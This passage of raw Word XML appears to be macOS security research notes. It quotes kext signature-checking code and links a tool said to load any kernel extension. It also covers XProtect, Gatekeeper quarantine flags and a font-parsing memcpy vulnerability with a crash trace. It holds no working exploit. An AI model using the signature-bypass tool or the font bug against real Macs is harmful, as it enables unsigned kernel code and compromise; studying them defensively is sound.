      <w:r>
        <w:t>$ ps aux | grep Safari patrick 15099 /Applications/Safari.app/Contents/MacOS/Safari</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRPr="006B4005" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc445313333"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kernel extension loader</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="00F2723E" w:rsidP="00716C7F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F2723E">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\kext_tools-384.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2723E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F2723E">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>kextd_request.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063031C" w:rsidRDefault="0063031C" w:rsidP="00F2723E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user mode signature verification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>//check signature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>sigResult = checkKextSignature(theKext);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>//invalid signature?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>if(sigResult != 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">//error msg </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:tab/>
        <w:t>OSKextLogCFString(“ERROR: \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>invalid signature, will not load”);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:tab/>
        <w:t>//bail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:tab/>
        <w:t>goto finish;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C662A" w:rsidRPr="005C662A" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>//load kext</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063031C" w:rsidRDefault="005C662A" w:rsidP="005C662A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>OSKextLoadWithOptions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C662A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>(theKext);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2723E" w:rsidRDefault="0063031C" w:rsidP="0063031C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0063031C">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Open source tool to load any kext</w:t>
      </w:r>
      <w:r w:rsidR="00F2723E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063031C" w:rsidRDefault="004106D2" w:rsidP="0063031C">
      <w:hyperlink r:id="rId87" w:anchor="a9908aa0864302ecd798e121617cba976" w:history="1">
        <w:r w:rsidR="0063031C" w:rsidRPr="00D320B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://svn.tweakbsd.org/wsvn/Kext.Heroine/trunk/Kext%20Tool/?#a9908aa0864302ecd798e121617cba976</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0063031C" w:rsidRDefault="0063031C" w:rsidP="0063031C"/>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Default="00F2723E" w:rsidP="00F2723E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">invalid signature exception </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2723E" w:rsidRPr="00716C7F" w:rsidRDefault="00F2723E" w:rsidP="00716C7F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB6F65" w:rsidRDefault="00AA4C70" w:rsidP="00BB6F65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc445313334"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XProtect</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w:rsidR="00AA4C70" w:rsidRPr="00AA4C70" w:rsidRDefault="00AA4C70" w:rsidP="00AA4C70">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>OS X’s built-in anti-virus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4C70">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>product</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB6F65" w:rsidRDefault="00AA4C70" w:rsidP="00BB6F65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc445313335"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Gatekeeper</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w:rsidR="00BB6F65" w:rsidRDefault="00AA4C70" w:rsidP="00AA4C70">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>Verifies software, disallowing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4C70">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>unauthorized binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRPr="006B4005" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc445313336"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Quarantine Flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRPr="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>//attibutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRPr="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">$xattr </w:t>
      </w:r>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l ~/Downloads/googlechrome.dmg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRPr="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>com.apple.quarantine:0001;534e3038;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Google Chrome; B8E3DA59-</w:t>
      </w:r>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>­‐</w:t>
      </w:r>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32F6-</w:t>
      </w:r>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>­‐</w:t>
      </w:r>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4580-</w:t>
      </w:r>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>­‐</w:t>
      </w:r>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8AB3...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FFF6FB3" wp14:editId="156CF5D4">
            <wp:extent cx="3937000" cy="3117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37000" cy="3117850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GetaKeeper tips</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001373F2" w:rsidRDefault="001373F2" w:rsidP="001373F2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="135" w:name="_Toc445313337"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Font</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w:rsidR="00D4008B" w:rsidRDefault="00D4008B" w:rsidP="001373F2">
      <w:pPr>
        <w:ind w:firstLine="210"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4008B">
        <w:t>M:\Work\Mac_All\Mac_exploit_vulnerability\Mac font exploit\Font Parsing Vulnerabilities   Yahoo Security.htm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001373F2" w:rsidRDefault="001373F2" w:rsidP="001373F2">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001373F2" w:rsidRDefault="00D4008B" w:rsidP="001373F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc445313338"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ATS (Apple Type Service)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w:rsidR="001373F2" w:rsidRDefault="001373F2" w:rsidP="001373F2"/>
    <w:p w:rsidR="00D4008B" w:rsidRDefault="00D4008B" w:rsidP="001373F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>The ATS server is a process that is responsible for maintaining the font database for Mac OS X. It activates and deactivates fonts, maintains and scales glyph outline data, maintains font caches, and communicates information about font availability between font clients and font utility applications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41154" w:rsidRDefault="00F41154" w:rsidP="001373F2"/>
    <w:p w:rsidR="00F41154" w:rsidRPr="00F41154" w:rsidRDefault="00F41154" w:rsidP="00F41154">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41154">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>One of the vulnerabilities found in ATS had to do with the size argument being attacker controlled in a call to memcpy. A snippet of the stack trace is pasted below:</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tab/>
        <w:t>Thread 0 Crashed:: Dispatch queue: com.apple.main-thread</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tab/>
        <w:t xml:space="preserve">0   libsystem_platform.dylib      </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41154">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff91599fc9 _platform_memmove$VARIANT$Unknown + 41</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lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">1   libTrueTypeScaler.dylib       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41154">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff943a2daa CreateScalerVariationBlock(fsg_SplineKey*, memoryContext*, unsigned int, FontVariation const*) + 281</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tab/>
        <w:t xml:space="preserve">2   libTrueTypeScaler.dylib       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41154">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff943a1e2f AssureStrikeBlocks(fsg_SplineKey*, memoryContext*, cacheStrike*, TStrikeDescription const*) + 121</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tab/>
        <w:t xml:space="preserve">3   libTrueTypeScaler.dylib       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41154">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff943a6879 TTGetStrikeSpecs + 129</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41154" w:rsidRPr="00F41154" w:rsidRDefault="00F41154" w:rsidP="00F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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41154">
        <w:rPr>
